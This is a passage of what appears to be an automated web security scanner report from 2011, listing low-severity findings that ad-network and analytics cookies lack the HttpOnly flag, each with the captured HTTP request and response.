PWRH/1MT2luVJbro74r6EmLVmoshJLasg7fnzqszJ2WV9c+bKMnT+z8ZN1FhKx/K0FWoUf1EEuWbvAz4cqAfgEtHfT8+fo6aj/rPHGUjNsNae6l1VttJItBc2XnDjizNH7anCs3JH29ZpHJCcZvoOS6ifQ3AsA="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:50 GMT


14.25. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_BFfo="MLsXr9EvcS5joBDnTrInbrvzpTlezxNylzFx7q/7jh3vp9AaQ0d9+4VlnSrvgBJz6voGf2x+1Z6RdS2pI5TjgfZ77T3M2t7X2iBHBnAKpH5maLzmozIHYGm7ZsUgnorFipEdgxPJ/VuCSUSeSzr0fhvZs1RpQ2eynAXm+ZYRA0lY99PWYzTVxA+dgG4eyEo6fI6nOFv7VETg9VbOEYxF1bxw9rxFW2/VYfto5WLdqS8AVUs4gxrGXxowSUIPPw4TaPajZMsEG9QysBpXO9+vMJzhH7J7pRXm6jp5YWVv1nqFVwl5k//RXPfOpv8fCdS04EgjnPjAmJGexMwDpJoGPjBw2JOksGDgcEossWHD46TEJ5Ur3vHnDUTUWzfCTfvl2X7FBShnd/mjEZgT/74wiYnRHCJHCNJv/RnwYw=="; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_btY7="MLsXr98vcS5joAC3cWnZbLu/LxacmO6l/ARkBxpP1JJrJebK5u0oIec5hQtxppxsRjkmyEG97JGtnHKzbcarrWXvOcKbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR30Ociq0ao4q/grq6lsLC0KtAAADMs0buh6LSM9MG0LIcGHe70yIHgew/Eh0uLc+4c/4njp7GcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Lk2j36bu66uGkRrS4CsiWzoeFXOeaMh4yHFMNx7MqLYBUYmEVrbUD55ScTBefUUF0U4E7w5UEa9kMK7iC9gTmt3xw0L/2hRO9SwVqZNP64GcOJoZDuIezY3VtCazAUM7wNTb7K0tPc0/B538LlHHOIWHyDI6Pcx"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:31 GMT


14.26. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/guarantee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=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; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_Kz1B="MLsXr98vcS5joAD3bWnZbLvnP/+KE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AVFSd5d5ssFdZ2XdS1J6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh2xYI3Fvzvh3NuiMBnovWFDuF1xjfsYP1R8qsG42VULSa+sr/35iz34m/11lMDXN1AX9njioLN2ChPaIXlfxBectuiUVgU0P45W3JtxbyyxtPjFDFvSB3z65Y465ibv+/5utsqAHA6C7nBh6djpodR2d3ogV4aXJvd1v+vu8G0OhpMAsq67dES6DnMmod26xlYmpIm7oLLHQreFyS+X9JpEnNjiLVeG1pqatl8HZNbwSbBG8PdUu8OmYBIq2J4KA3tC3AUVE/bcNrvKaXikFYzLm/nYzn3T771H+QePf7"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Uihs="MLsXr98vcS5joAD3Ramm7m1t+VG2u86F7odjMpPWFVoxB1SJLO0k7UGOYbbf8s8JwOo38i801L3UUpBivWyOp/577cI3mcnXAMS8oxiDDVp8H1BGXR3pIUBTO7FKrI7Km7BHstMovCk8DJLbgwN2wt/S3/iJ9f6MyG7GkFGqxvSem7K9r4yjmiQLUCCesqM4fw+vm8qLr7Pl6R55NhiwdK8AeGKycXRkK6kZZOOdtv9lCrPwX1hpNjhvRGV9wQXjWeXpq2LuHOSBArCH67JFEDRLnajtbNk3TMVytWT4Z4wi1GXZQb//Zfdfkj/gDfRRKLTWu9FT+q8awI+fnYB/OYTeMmZZOEqoB2TEOxgpmKNftUwnqldNqerushNz7sP1NAJwWHc3RbB+ptOuus8j9ey35j2110rTiRX28w=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:17:35 GMT


14.27. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/how-it-works/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=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; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_2Ia5="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVUbqNw0KcSykIgDMCLZ+LUekPkU3ZzHAnufPANfumkONPJ1vRRh59tenoHHjrRb5k67Sm6BnvhZOe1mCSUSYzT/0fgOACtqy5iXVomtxAZzacvIs1os8ctiYILCzcUGEKwAUbYDZ+gRfyTNVizEkjHghBeBOehkXDWkFVpZNcmrau472yi7Tk1UQDlT2PRGx4ny6aEMndDmCQRPdzJomsgEPKOZANGnQYsYrLEvr+wJqPo2Md9XyeSIz5rA/HijFNKINO3FJhacxFZoYVdm5OhizDcF2J4MFaMQYQ5VLkgCwK5k1whxQ3zMkV3gw6CsqcayotvrS10X59UwbUP/ABx6/FxtZ9qF5+9xsG5L3dw=="; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NlSe="MLsXr08uMT5n4BD3bLua7kUHKxycqFuHHYWrQ4CcmI8DWfWhTlgNS3bAhAe5Ek6MTKFNTT5xYaf4SRDbPGD9pzbuj7m3W9LehF9HBn8KpH5maLzmo/IEYGm7ZsUglwRaDpS5XjA7brvD0QxRDVCLNbezOsf0yoqeO4c9EfAZWEqBka72ko6UicWuG1yTBBss9ckcEDqRZwS4RMHgTDyNbZtXdwEX5eFl3+RCbqZ+L5dJtYUpZZz6Q6z8dXjprrK/cKVEi+YyPq9Z14+HRRl2OLIVdWQbBiBD/7TuEYKhZnZfNuGiEAKk+jB3BMi6NjJ/X4+zFjN4JIVambd/JpUPzroQ0nl7LNG8eII/VzxFlhp4C3BW5XBxBS+tnLnyILAgwEQIeWrRbOj1i8mDDDnMo6DH5j2110rT0dL2EQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:17:25 GMT


14.28. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/guarantee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=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; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_Kz1B="MLsXr98vcS5joAD3bWnZbLvnP/+KE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AVFSd5d5ssFdZ2XdS1J6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh2xYI3Fvzvh3NuiMBnovWFDuF1xjfsYP1R8qsG42VULSa+sr/35iz34m/11lMDXN1AX9njioLN2ChPaIXlfxBectuiUVgU0P45W3JtxbyyxtPjFDFvSB3z65Y465ibv+/5utsqAHA6C7nBh6djpodR2d3ogV4aXJvd1v+vu8G0OhpMAsq67dES6DnMmod26xlYmpIm7oLLHQreFyS+X9JpEnNjiLVeG1pqatl8HZNbwSbBG8PdUu8OmYBIq2J4KA3tC3AUVE/bcNrvKaXikFYzLm/nYzn3T771H+QePf7"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o_YB="MLsXr98vcS5joAD3RWnZbLtzZAzP6/3QvbFY8brNjhfQZzRy/3X9YSyGbFxsN8G0yqulX+Pn6fT77EwpfyXgQdDoD8ExG9XdosQTSO5JaI/ifm4pCaBWAGUXgyxMnMeayp9qM4Dfxcgivu6oRZYK4tLsyUCNHsJzA0ue4bYZm3Yr1Ii/8Frh4YCDSU2AKRAYmYO4mhxXzjFVizEkhHghBeBMejkXDWkFVpZFdJBb+7HqzCzTk1UQDlT2PROx4nyyaEMjdDmLFND1M5pXG++vMJzhD7J7mRXm6jp5YWVv1nqFctXyeSI7ZLD/HSjFMKINO4FJgacx3JvckX6F4tmU1Fj0WAtVBJbk2nr4A7CJzwfNMNhtSyL1bGn7HiJkIFLdmtlcSukRVDvh+KeI1SEyoci/ul5Ntl5t9EXwew=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:55 GMT


14.29. http://affiliate.idgtracker.com/rd/r.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliate.idgtracker.com
Path:   /rd/r.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rd/r.php?sid=14&pub=300009&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: affiliate.idgtracker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=test; PHPSESSID=g7dpq2uc614mccbr73j7na1id6; uid13=205557649-20110423230900-eebb54cfd8f3db802fb39a5eacf5be74-0

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:09:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR STP COM", policyref="/w3c/p3p.xml"
Set-Cookie: test=test; expires=Sun, 24-Apr-2011 03:09:14 GMT
Set-Cookie: track=track; expires=Sun, 24-Apr-2011 03:09:14 GMT
Set-Cookie: uid14=205557652-20110423230924-eebb54cfd8f3db802fb39a5eacf5be74-0; expires=Wed, 25-May-2011 02:29:24 GMT; path=/
Location: http://www.identityguard.com/gscc.aspx?mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.30. http://affiliate.idgtracker.com/rd/r.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliate.idgtracker.com
Path:   /rd/r.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rd/r.php?sid=13&pub=300009&c1=id4%20106163471CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: affiliate.idgtracker.com
Proxy-Connection: keep-alive
Referer: http://partners.nextadnetwork.com/z/371/CD1/id4+106163471
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=test; PHPSESSID=g7dpq2uc614mccbr73j7na1id6

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:09:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR STP COM", policyref="/w3c/p3p.xml"
Set-Cookie: test=test; expires=Sun, 24-Apr-2011 03:08:50 GMT
Set-Cookie: track=track; expires=Sun, 24-Apr-2011 03:08:50 GMT
Set-Cookie: uid13=205557649-20110423230900-eebb54cfd8f3db802fb39a5eacf5be74-0; expires=Wed, 25-May-2011 02:29:00 GMT; path=/
Location: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.31. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytic.hotelclub.com
Path:   /b/ss/flairviewhcprod/1/H.17/s84063693960197

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/flairviewhcprod/1/H.17/s84063693960197?AQB=1&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: analytic.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 12:09:49 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA098605162390-600001A0A001BFE4[CE]; Expires=Fri, 22 Apr 2016 12:09:48 GMT; Domain=.hotelclub.com; Path=/
Location: http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197?AQB=1&pccr=true&vidn=26DA098605162390-600001A0A001BFE4&&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 12:09:48 GMT
Last-Modified: Mon, 25 Apr 2011 12:09:48 GMT
